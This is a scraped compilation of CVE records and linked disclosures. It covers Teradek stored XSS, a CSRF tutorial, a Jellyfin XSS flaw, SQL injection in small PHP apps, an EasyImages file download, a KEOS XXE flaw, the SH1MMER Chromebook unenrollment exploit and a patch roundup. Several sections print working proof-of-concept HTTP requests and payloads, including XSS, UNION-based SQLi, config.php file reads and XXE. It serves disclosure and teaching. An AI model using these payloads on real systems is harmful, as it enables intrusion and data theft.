** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Clip all firmware versions allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.

**Vulnerability Research****Teradek Cross-Site Scripting Vulnerability Advisory****Multiple Teradek Devices Found Vulnerable to Authenticated Stored Cross-Site Scripting****By: _Tyler Butler_, _Apr 29, 2021_ | _3 min read_**

Back in May, I disclosed a series of cross-site scripting vulnerabilities in the Cube 305 video encoder, a legacy video encoder from vendor Teradek. Teradek is video solutions manufacturer that develops networked devices for broadcast, cinema & imaging applications. After working through initial vulnerability disclosure with Teradek customer support, they informed me that “based on the scope of work involved, the product management team has determined that this issue will not be fixed for the EOL products”. In this blog post, I’ll describe the disclosure timeline and vulnerability details. While they declined to address the vulnerability, Teradek was overall a supportive partner in the vulnerabiltiy disclosure process, providing consistent communication and even going out of their way to provide a detailed list of effected devices.

See the original vulnerability disclosure here

****Index****

*   Disclosure Timeline
*   About the Vendor
*   Vulnerability Details

****⏱ Disclosure Timeline****

I discover the vulnerability and open support ticket #128254 via support.teradek.com

12 May 2021

Teradek responds to initial report and requests additional information.

13 May 2021

Continuous communication between myself and Teradek support

14 May - Jul 15th 2021

Teradek indicates the product will be classified as EOL and the issue will not be addressed. Teradek support provides a full list of effected products so I can engage Mitre CVE team

16 Jul 2021

****💡 About the Vendor****

Teradek produces video encoding devices used by streamers and video professionals alike. According to their website, “Teradek designs and manufactures high performance video solutions for broadcast, cinema, and general imaging applications. From wireless monitoring, color correction, and lens control, to live streaming, SaaS solutions, and IP video distribution, Teradek technology is used around the world by professionals and amateurs alike to capture and share compelling content.” Some of their most popular products include the Bolt, a zero delay HDR solution; the Teradek Ace, a compact wireless video system; and the Serve Pro, a compact live streaming HD system for android and MacOS.

****💀 Vulnerability Details****

The Teradek Cube 305 and all the following Teradek devices are vulnearble to a stored cross-site scripting vulnerability via the Friendly Hostname field within the System Information Settings. Remote authenticated attackers can exploit this vulnerability by embedding malicious JavaScript payloads that execute in the context of victim browsers. The impact of this vulnerability is severe, as malicious code could be used to track victim browsers, steal cookies, or further exploit users.

1.  Bond (firmware releases in the 7.3.x range were the final releases)
2.  Bond II (firmware releases in the 7.3.x range were the final releases)
3.  Bond Pro (firmware releases in the 7.3.x range were the final releases)
4.  Brik (firmware releases in 7.2.x were final)
5.  Clip
6.  Cube (firmware releases in the 7.3.x range were the last releases)
7.  Cube Pro (firmware releases in the 7.3.x range were the final releases)
8.  Slice (1st generation; firmware releases in the 7.3.x range were the final releases)
9.  Sphere
10.  VidiU / VidiU Mini (firmware 3.0.8 was the final release)

****⚰️ Proof of Concept****

**Payload**: Services.Zeroconf.friendlyname=Cube+255+04834<svg/onload=alertxss!\>

    POST /cgi-bin/api.cgi HTTP/1.1
    Host: 172.16.1.1
    Content-Length: 415
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.16.1.1
    Referer: http://172.16.1.1/index.cs
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: serenity-session=29328153
    Connection: close
    
    Services.Zeroconf.friendlyname=Cube+255+04834<svg/onload=alert`xss!`>&Services.Zeroconf.Bonjour.enable=1&Services.HTTP.port=80&Services.HTTP.ssl=disable&Services.DDNS.enable=0&Services.DDNS.system=dyndns%40dyndns.org&Services.DDNS.alias=&Services.DDNS.username=%3Csvg%2Fonload%3Dalert%60xss+3!%60%3E&Services.DDNS.password=&Services.DDNS.interval=60&save=Services&apply=Services&noredirect=%2Findex.cs%3Fpage%3Dnetwork.services&command=set 
    

**Sending Payload with BurpSuite**

**Entering Payload via Device Settings**

**Payload Execution**

CVE-2021-37374: Teradek Cross-Site Scripting Vulnerability Advisory

**According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?**

Successful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20221213**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221213)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-21720: Microsoft Edge (Chromium-based) Tampering Vulnerability

A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows a discount coupon to be arbitrarily created if an attacker with administrative privileges interacts on the CSRF page.

In this section, we'll explain what cross-site request forgery is, describe some examples of common CSRF vulnerabilities, and explain how to prevent CSRF attacks.

**What is CSRF?**

Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other.

**Labs**

If you're already familiar with the basic concepts behind CSRF vulnerabilities and just want to practice exploiting them on some realistic, deliberately vulnerable targets, you can access all of the labs in this topic from the link below.

View all CSRF labs

**What is the impact of a CSRF attack?**

In a successful CSRF attack, the attacker causes the victim user to carry out an action unintentionally. For example, this might be to change the email address on their account, to change their password, or to make a funds transfer. Depending on the nature of the action, the attacker might be able to gain full control over the user's account. If the compromised user has a privileged role within the application, then the attacker might be able to take full control of all the application's data and functionality.

**How does CSRF work?**

For a CSRF attack to be possible, three key conditions must be in place:

*   **A relevant action.** There is an action within the application that the attacker has a reason to induce. This might be a privileged action (such as modifying permissions for other users) or any action on user-specific data (such as changing the user's own password).
*   **Cookie-based session handling.** Performing the action involves issuing one or more HTTP requests, and the application relies solely on session cookies to identify the user who has made the requests. There is no other mechanism in place for tracking sessions or validating user requests.
*   **No unpredictable request parameters.** The requests that perform the action do not contain any parameters whose values the attacker cannot determine or guess. For example, when causing a user to change their password, the function is not vulnerable if an attacker needs to know the value of the existing password.

For example, suppose an application contains a function that lets the user change the email address on their account. When a user performs this action, they make an HTTP request like the following:

POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

email=wiener@normal-user.com

This meets the conditions required for CSRF:

*   The action of changing the email address on a user's account is of interest to an attacker. Following this action, the attacker will typically be able to trigger a password reset and take full control of the user's account.
*   The application uses a session cookie to identify which user issued the request. There are no other tokens or mechanisms in place to track user sessions.
*   The attacker can easily determine the values of the request parameters that are needed to perform the action.

With these conditions in place, the attacker can construct a web page containing the following HTML:

<html>
    <body>
        <form action="https://vulnerable-website.com/email/change" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

If a victim user visits the attacker's web page, the following will happen:

*   The attacker's page will trigger an HTTP request to the vulnerable web site.
*   If the user is logged in to the vulnerable web site, their browser will automatically include their session cookie in the request (assuming SameSite cookies are not being used).
*   The vulnerable web site will process the request in the normal way, treat it as having been made by the victim user, and change their email address.

**Note**

Although CSRF is normally described in relation to cookie-based session handling, it also arises in other contexts where the application automatically adds some user credentials to requests, such as HTTP Basic authentication and certificate-based authentication.

**How to construct a CSRF attack**

Manually creating the HTML needed for a CSRF exploit can be cumbersome, particularly where the desired request contains a large number of parameters, or there are other quirks in the request. The easiest way to construct a CSRF exploit is using the CSRF PoC generator that is built in to Burp Suite Professional:

*   Select a request anywhere in Burp Suite Professional that you want to test or exploit.
*   From the right-click context menu, select Engagement tools / Generate CSRF PoC.
*   Burp Suite will generate some HTML that will trigger the selected request (minus cookies, which will be added automatically by the victim's browser).
*   You can tweak various options in the CSRF PoC generator to fine-tune aspects of the attack. You might need to do this in some unusual situations to deal with quirky features of requests.
*   Copy the generated HTML into a web page, view it in a browser that is logged in to the vulnerable web site, and test whether the intended request is issued successfully and the desired action occurs.

**How to deliver a CSRF exploit**

The delivery mechanisms for cross-site request forgery attacks are essentially the same as for reflected XSS. Typically, the attacker will place the malicious HTML onto a web site that they control, and then induce victims to visit that web site. This might be done by feeding the user a link to the web site, via an email or social media message. Or if the attack is placed into a popular web site (for example, in a user comment), they might just wait for users to visit the web site.

Note that some simple CSRF exploits employ the GET method and can be fully self-contained with a single URL on the vulnerable web site. In this situation, the attacker may not need to employ an external site, and can directly feed victims a malicious URL on the vulnerable domain. In the preceding example, if the request to change email address can be performed with the GET method, then a self-contained attack would look like this:

<img src="https://vulnerable-website.com/email/change?email=pwned@evil-user.net">

**Common defences against CSRF**

Nowadays, successfully finding and exploiting CSRF vulnerabilities often involves bypassing anti-CSRF measures deployed by the target website, the victim's browser, or both. The most common defenses you'll encounter are as follows:

*   **CSRF tokens** - A CSRF token is a unique, secret, and unpredictable value that is generated by the server-side application and shared with the client. When attempting to perform a sensitive action, such as submitting a form, the client must include the correct CSRF token in the request. This makes it very difficult for an attacker to construct a valid request on behalf of the victim.
    
*   **SameSite cookies** - SameSite is a browser security mechanism that determines when a website's cookies are included in requests originating from other websites. As requests to perform sensitive actions typically require an authenticated session cookie, the appropriate SameSite restrictions may prevent an attacker from triggering these actions cross-site. Since 2021, Chrome enforces Lax SameSite restrictions by default. As this is the proposed standard, we expect other major browsers to adopt this behavior in future.
    
*   **Referer-based validation** - Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. This is generally less effective than CSRF token validation.
    

For a more detailed description of each of these defenses, as well as how they can potentially be bypassed, check out the following materials. These include interactive labs that let you practice what you've learned on realistic, deliberately vulnerable targets.

**Read more**

*   LABS Bypassing CSRF token validation
*   LABS Bypassing SameSite cookie restrictions
*   LABS Bypassing Referer-based CSRF defenses

For details on how to properly implement these defenses in order to prevent some of these issues on your own websites, see How to prevent CSRF vulnerabilities

CVE-2022-47130: What is CSRF (Cross-site request forgery)? Tutorial & Examples | Web Security Academy

In Jellyfin 10.8.x through 10.8.3, the name of a playlist is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0030 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0030  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor acknowledged vulnerability:** Yes  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23636

**Description**

The playlist name in Jellyfin 10.8.1 is vulnerable to a stored XSS which allows a low privileged user to steal access tokens from high privileged users.  
The injected code is triggered everytime a user visits the playlist page. Since access tokens are stored in the **localStorage** an attacker is able to take over accounts by reading their values.

**Proof of Concept**

The following screenshot shows the executed JavaScript payload in the victim's browser.

The following request creates a payload with injected _name_.

POST /Playlists?Name=%22%3E%3Cimg%20src%3D%2FX%20onerror%3Dalert(document.domain)%3E&Ids=0358e400bf19a370e7f2e4e69f2af64d&userId=e9239683c3384717810a900f1c2c7eb5 HTTP/1.1  
Host: localhost:8096  
Content-Length: 0  
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"  
accept: application/json  
Content-Type: application/json  
\[...\]

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23636 

**Timeline**

*   **2022-07-18:** First contact request via security@jellyfin.org
*   **2022-08-02:** Vulnerability details submitted
*   **2022-08-16:** Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23636: Security Advisory usd-2022-0030 | usd HeroLab

Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control.
Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console, including the features that are available to users.
"Each enrolled device complies with the policies you set until you wipe or deprovision it," Google

A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control.

Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console, including the features that are available to users.

"Each enrolled device complies with the policies you set until you wipe or deprovision it," Google states in its documentation.

That's where the exploit – dubbed Shady Hacking 1nstrument Makes Machine Enrollment Retreat aka **SH1MMER** – comes in, allowing users to bypass these admin restrictions.

The method is also a reference to shim, a Return Merchandise Authorization (RMA) disk image used by service center technicians to reinstall the operating system and run diagnosis and repair programs.

The Google-signed shim image is a "combination of existing Chrome OS factory bundle components" – namely a release image, a toolkit, and the firmware, among others – that can be flashed to a USB drive.

A Chromebook can then be booted in developer mode with the drive image to invoke the recovery options. A shim image can either be universal or specific to a Chromebook board.

SH1MMER takes advantage of a modified RMA shim image to create a recovery media for the Chromebook and writes it to a USB stick. Doing so requires an online builder to download the patched version of the RMA shim with the exploit.

The next step entails launching the recovery mode on the Chromebook and plugging the USB stick containing the image into the device to display an altered recovery menu that enables users to completely unenroll the machine.

"It will now behave entirely as if it is a personal computer and no longer contain spyware or blocker extensions," the Mercury Workshop team, which came up with the exploit, said.

"RMA shims are a factory tool allowing certain authorization functions to be signed, but only the KERNEL partitions are checked for signatures by the firmware," the team further elaborated. "We can edit the other partitions to our will as long as we remove the forced readonly bit on them."

Additionally, the SH1MMER menu can be used to re-enroll the device, enable USB boot, open a bash shell, and even allow root-level access to the ChromeOS operating system.

The Hacker News has reached out to Google for comment, and we will update the story if we hear back.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New SH1MMER Exploit for Chromebook Unenrolls Managed ChromeOS Devices

Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.

**Forget Heart Message Box 1.1 has multiple SQL injections****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

1.1

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.43

**Vulnerability Description AND recurrence:**

Vulnerability Documentation：_adminpost.php_

Parameter: name

POST /admin/loginpost.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.2.101/
Cookie: PHPSESSID=28s17sili7ldmc68goe212s593
Content-Length: 29
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.2.101
Connection: Keep-alive

login=&name=1232\*&pass=123456

  

Vulnerability Documentation：_cha.php_

Parameter: name

POST /cha.php HTTP/1.1
Host: 192.168.2.24
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.24/cha.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs
Connection: close

name=1\*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80

**Restoration suggestions**

Filtering of user input or using magic methods.

CVE-2023-24956: Forget Heart Message Box 1.1 has multiple SQL injections · Issue #1 · Mortalwangxin/lives

Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.

**EasyImages2.0-arbitrary-file-download-vulnerability****Found on: 2022-12-27****Impact version**

EasyImages2.0 ≤ v2.6.7

**Analysis Report：**

_Vulnerability path: /application/down.php_

payload：

GET /application/down.php?dw=config/config.php HTTP/1.1
Host: 192.168.2.13
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm\_lvt\_c790ac2bdc2f385757ecd0183206108d=1672116632; Hm\_lpvt\_c790ac2bdc2f385757ecd0183206108d=1672149755
Connection: close

You can download any file in the host by passing the dw parameter to the get request

**Fixes**

Specify the download directory to download only for the specified directory, other directories are filtered and requests are rejected.

CVE-2022-48161: GitHub - sunset-move/EasyImages2.0-arbitrary-file-download-vulnerability: EasyImages2.0 arbitrary file download vulnerability

Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote).

**Exploit Title: CVE-2022-47873 KEOS Software XXE****Exploit Author: Ömer Akincir****Team: Ömer Yılmaz****Version: 1.0 >=****Vuln Details: XXE****Description:**

KEOS application running on the web is vulnerable to XML External Entity (XXE) attack.

**Impact:**

An attacker can trigger SSRF over XXE using Proof Of Concept.

**PoC:**

    POST /KEOS/ HTTP/1.1
    Host:
    Content-Type: application/xml
    Soapaction: ""
    Content-Length: 160
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
    
    <?xml version="1.0" encoding="utf-8"?>
    
      <!DOCTYPE roottag PUBLIC "-//A//B//EN" "http://BURP-COLLOBRATOR-URL">
    
      <roottag>test</roottag>
    

Ref: https://github.com/waspthebughunter/CVE-2022-47873

CVE-2022-47873: CVE-2022-47873 KEOS Software XXE - Fordefence - Adli Bilişim Laboratuvarı

January saw a slew of security patches for iOS, Chrome, Windows, and more.

The Android security patch is available to Google’s Pixel devices, which have their own specific updates, and Samsung’s Galaxy range, including Samsung Galaxy Note 10, Galaxy S21, and Galaxy A73. You can check for the update in your settings.

Microsoft Patch Tuesday

Microsoft fixed a rather hefty 98 security issues in its first Patch Tuesday of the year, including an already exploited vulnerability: CVE-2023-21674 is an elevation of privilege flaw impacting the Windows Advanced Local Procedure Call that could lead to browser sandbox escape. 

By exploiting the bug, an adversary could gain System privileges, Microsoft wrote, confirming that the flaw has been detected in real-life attacks.

Another elevation of privilege vulnerability in the Windows Credential Manager User Interface, CVE-2023-21726, is relatively easy to exploit and doesn’t require any interaction from the user.

January’s Patch Tuesday also saw Microsoft fix nine Windows Kernel vulnerabilities, eight of which are elevation of privilege issues and one information disclosure vulnerability.

Mozilla Firefox

Software firm Mozilla has released important updates for its Firefox browser, the most serious of which have been the subject of a warning by the US Cybersecurity and Infrastructure Security Agency (CISA). 

Among the 11 flaws fixed in Firefox 109 are four rated as having a high impact, including CVE-2023-23597, a logic bug in process allocation that could allow adversaries to read arbitrary files. Meanwhile, Mozilla said its security team found memory safety bugs in Firefox 108. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort, some could have been exploited to run arbitrary code,” it wrote.

An attacker could exploit some of these vulnerabilities to take control of an affected system, CISA said in its advisory. “CISA encourages users and administrators to review Mozilla’s security advisories for Firefox ESR 102.7 and Firefox 109 for more information and apply the necessary updates.”

VMWare

Enterprise software maker VMWare has published a security advisory detailing four flaws affecting its VMware vRealize Log Insight product. Tracked as CVE-2022-31706, the first is a directory traversal vulnerability with a CVSSv3 base score of 9.8. By exploiting the flaw, an unauthenticated, malicious actor could inject files into the operating system of an impacted appliance, resulting in RCE, VMWare says.

Meanwhile, a broken access control RCE vulnerability tracked as CVE-2022-31704 also has a CVCCv3 base score of 9.8. It goes without saying that those impacted by these vulnerabilities should patch as soon as possible.

Oracle

Software giant Oracle has released patches for a whopping 327 security vulnerabilities, 70 of which are rated as having a critical impact. Worryingly, 200 of the issues patched in January can be exploited by a remote unauthenticated attacker.

Oracle is recommending that people update their systems as soon as possible, warning that it has received reports of “attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches.”

In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches, it says.

SAP

SAP’s January Patch Day has seen the release of 12 new and updated security notes. With a CVSS score of 9.0, CVE-2023-0014 is rated as the most severe bug by security firm Onapsis. The flaw affects the majority of all SAP customers and its mitigation is a challenge, Onapsis says. 

The capture-replay vulnerability is a risk because it could allow malicious users to obtain access to an SAP system. “Complete patching of the vulnerability includes applying a kernel patch, an ABAP patch, and a manual migration of all trusted RFC and HTTP destinations,” Onapsis explains.

Tag

#chrome